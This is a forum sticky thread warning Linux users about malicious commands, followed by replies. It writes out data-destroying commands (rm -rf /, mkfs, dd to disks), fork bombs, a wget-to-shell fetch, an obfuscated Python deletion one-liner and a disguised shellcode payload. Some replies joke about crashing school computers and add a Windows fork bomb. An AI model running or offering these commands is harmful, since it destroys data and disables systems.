Announcement

Collapse
No announcement yet.

Malicious commands you shouldn't run.

Collapse
This is a sticky topic.
X
X
  • Filter
  • Time
  • Show
Clear All
new posts

  • Malicious commands you shouldn't run.

    Due to some issues I have seen on other forums I thought it may be a good idea to post this here.

    Here are some common examples of dangerous commands that should raise a bright red flag. Again, these are extremely dangerous and should not be attempted on a computer that has any physical connection to valuable data -- many of them will even cause damage from a LiveCD environment.

    Again, DANGEROUS COMMANDS -- look but DO NOT RUN.

    Also, this is far from an exhaustive list, but should give you some clues as to what kind of things people may try to trick you into doing. Remember this can always be disguised in an obfuscated command or as a part of a long procedure, so the bottom line is take caution for yourself when something just doesn't "feel right".

    Deletion Commands:
    Delete all files, delete current directory, and delete visible files in current directory. It's quite obvious why these commands can be dangerous to execute.
    Code:
    rm -rf /
    rm -rf .
    rm -rf *
    The only problem is that .., the link to the previous directory, will be matched by this and this will in turn delete everything above this directory level (oops!). A possible alternative that I can think of for this would be

    Code:
    rm -r .[^.]*
    which will exclude the entry "..". Of course, it probably has limitations of not matching certain entries, fixing which is an exercise left to the reader.

    Permissions changing:
    Code:
    chmod -R 777 /
    Will change the permissions for everything on the entire drive which will not just be insecure etc... but will break a LOT of things and the only fix is a full wipe and reinstall...... unless you have about a year on your hands to fix it all.

    Reformat: Data on device mentioned after the mkfs command will be destroyed and replaced with a blank filesystem.
    Code:
         mkfs
    mkfs.ext3
    mkfs.anything
    Block device manipulation: Causes raw data to be written to a block device. Often times this will clobber the filesystem and cause total loss of data:
    Code:
    any_command > /dev/sda
    dd if=something of=/dev/sda
    Forkbomb: Executes a huge number of processes until system freezes, forcing you to do a hard reset which may cause corruption, data damage, or other awful fates.
    In Bourne-ish shells, like Bash: (This thing looks really intriguing and curiousity provokes)
    Code:
    Code:
    :(){:|:&};:
    In Perl
    Code:
    Code:
    fork while fork
    I have seen forkbombs in use and they act very fast. Wiki article is here

    Tarbomb: Someone asks you to extract a tar archive into an existing directory. This tar archive can be crafted to explode into a million files, or inject files into the system by guessing filenames. You should make the habit of decompressing tars inside a cleanly made directory

    Decompression bomb:
    Someone asks you to extract an archive which appears to be a small download. In reality it's highly compressed data and will inflate to hundreds of GB's, filling your hard drive. You should not touch data from an untrusted source

    Shellscript: Someone gives you the link to a shellscript to execute. This can contain any command he chooses -- benign or malevolent. Do not execute code from people you don't trust
    Code:
         wget http://some_place/some_file
    sh ./some_file 
         Code:
         wget http://some_place/some_file -O- | sh
    Compiling code: Someone gives you source code then tells you to compile it. It is easy to hide malicious code as a part of a large wad of source code, and source code gives the attacker a lot more creativity for disguising malicious payloads. Do not compile OR execute the compiled code unless the source is of some well-known application, obtained from a reputable site (i.e. SourceForge, the author's homepage, an Ubuntu address).

    A famous example of this surfaced on a mailing list disguised as a proof of concept sudo exploit claiming that if you run it, sudo grants you root without a shell. In it was this payload:
    Code:
         char esp[] __attribute__ ((section(".text"))) /* e.s.p
    release */
                    = "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
                      "\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
                      "\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
                      "\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
                      "\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
                      "\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
                      "\x6e\x2f\x73\x68\x00\x2d\x63\x00"
                      "cp -p /bin/sh /tmp/.beyond; chmod 4755
    /tmp/.beyond;";
    To the new or even lightly experienced computer user, this looks like the "hex code gibberish stuff" that is so typical of a safe proof-of-concept. However, this actually runs rm -rf ~ / & which will destroy your home directory as a regular user, or all files as root. If you could see this command in the hex string, then you don't need to be reading this announcement. Otherwise, remember that these things can come in very novel forms -- watch out.


    Again, recall these are not at all comprehensive and you should not use this as a checklist to determine if a command is dangerous or not!

    For example, 30 seconds in Python yields something like this:

    Code:
    python -c 'import os; os.system("".join([chr(ord(i)-1) for i in "sn!.sg!+"]))'
    Where "sn!.sg!+" is simply rm -rf * shifted a character up. Of course this is a silly example -- I wouldn't expect anyone to be foolish enough to paste this monstrous thing into their terminal without suspecting something might be wrong.


    This is simply a copypasta from another forum. If anyone wants to make this a sticky please feel free. If you want any more commands added please pm me.
    Last edited by Lorem-Ipsum; 05-09-11, 14:29.
    Desktop: Intel i5-4690K | 16GB DDR3 | Gigabyte Z97N-WIFI | EVGA GTX 660 3GB | Windows 10
    Server 0: Gen8 HP Microserver | Proxmox Hypervisor Server 1: Gen8 HP Microserver | FreeNAS

  • #2
    Intresting read!
    PC1: Q6600 - 4GB DDR2-800 - ATI HD4850 1GB
    PC2: X2 3800 - 1GB DDR-400 - ATI 9250 256mb
    HTPC: E6600 - 2GB DDR2-533 - ATI HD5450 512mb

    Comment


    • #3
      Forkbomb, interesting.

      I'll have to run this on someones PC at school when they're not looking

      Comment


      • #4
        linux stuff this i think

        it was after reading up on things like this i stopped using unbuntu.
        "Those able to see beyond the shadows and lies of their culture will never be understood, let alone believed, by the masses."
        Plato

        Comment


        • #5
          Originally posted by Toonshorty View Post
          Forkbomb, interesting.

          I'll have to run this on someones PC at school when they're not looking
          In windows you just need to run
          Code:
          %0|%0
          in cmd.
          Quite nasty. I have seen computers freeze up instantly.

          Originally posted by marsey99 View Post
          linux stuff this i think

          it was after reading up on things like this i stopped using unbuntu.
          why?

          Its even easier to run cracks and the like on windows. lol
          Desktop: Intel i5-4690K | 16GB DDR3 | Gigabyte Z97N-WIFI | EVGA GTX 660 3GB | Windows 10
          Server 0: Gen8 HP Microserver | Proxmox Hypervisor Server 1: Gen8 HP Microserver | FreeNAS

          Comment


          • #6
            I've ran

            Code:
            :loop
            start notepad.exe
            goto loop
            On school computers once, we had competitions to see who's could crash first

            Comment


            • #7
              Originally posted by marsey99 View Post
              linux stuff this i think

              it was after reading up on things like this i stopped using unbuntu.
              Why? Many of these could easily be implemented on windows, it's just that historically there's not really be any need for them since there have been so many holes in internet explorer that web-based exploits have been the most effective way of wreaking havock.

              Also, a lot of these commands would only be especially nasty when run as 'root' (*nix superuser account). Most modern linux distro's provide tools like sudo, gksudo etc which mean that users don't need to be logged in as root full-time; basically you should only log on as root if you actually know what you are doing. In fact modern distributions work perfectly without ever having to open a terminal and run anything at all on the command line.

              Avoiding linux due to security concerns is a pretty bizarre decision. Your chances of being compromised by malware is massively higher on windows, but in both cases it ultimately comes down to common sense - don't run untrusted applications (whether these are executables or command line scripts like those listed here) and generally you won't have any problems.

              Comment


              • #8
                Back in the Win 95/98 days I used to go in places like PC World and edit the Autoexec.bat file putting in all sorts of loops and messy looking things. I wonder if the staff knew how to sort it out or if they would have to pack it up and send it back to Packard Bell etc.

                Comment


                • #9
                  Would the forkbombs stop after you restart it?
                  i7 950 @4GHz | 460 | 520 | 12Gb Mushkin RAM | H60 | Crucial M4 128gb | OCZ Onyx 240gb | Asus P6X58D-E | Asus Xonar D2X | R.A.T 9 Mouse | Corsair 1KW | LG BLu-ray Reader

                  Originally posted by Simon1987
                  I need to start spreading some reputation around just so I can +/- 0 you later.

                  Comment


                  • #10
                    Originally posted by Pullen View Post
                    Would the forkbombs stop after you restart it?
                    Yeah they would, that one probably wouldn't cause any serious harm.

                    Comment


                    • #11
                      Originally posted by Pullen View Post
                      Would the forkbombs stop after you restart it?
                      Yes they would. The problems occur if the script starting them also places them in the startup folder or the .xinitrc in linux.

                      However this can usually be stopped by booting in safemode.
                      Desktop: Intel i5-4690K | 16GB DDR3 | Gigabyte Z97N-WIFI | EVGA GTX 660 3GB | Windows 10
                      Server 0: Gen8 HP Microserver | Proxmox Hypervisor Server 1: Gen8 HP Microserver | FreeNAS

                      Comment


                      • #12
                        Just thought I would give this thread a bump for new members.
                        Desktop: Intel i5-4690K | 16GB DDR3 | Gigabyte Z97N-WIFI | EVGA GTX 660 3GB | Windows 10
                        Server 0: Gen8 HP Microserver | Proxmox Hypervisor Server 1: Gen8 HP Microserver | FreeNAS

                        Comment


                        • #13
                          Ask to get it stickied?
                          i7 2600k | MSI GTX 580 Twin Frozr II

                          Comment


                          • #14
                            Originally posted by sb89 View Post
                            Ask to get it stickied?
                            maybe a good idea. I'll PM a mod/admin,

                            EDIT; Thanks DT
                            Desktop: Intel i5-4690K | 16GB DDR3 | Gigabyte Z97N-WIFI | EVGA GTX 660 3GB | Windows 10
                            Server 0: Gen8 HP Microserver | Proxmox Hypervisor Server 1: Gen8 HP Microserver | FreeNAS

                            Comment


                            • #15
                              Stop tempting me, im going make a VM and do them now lol

                              Comment

                              Working...
                              X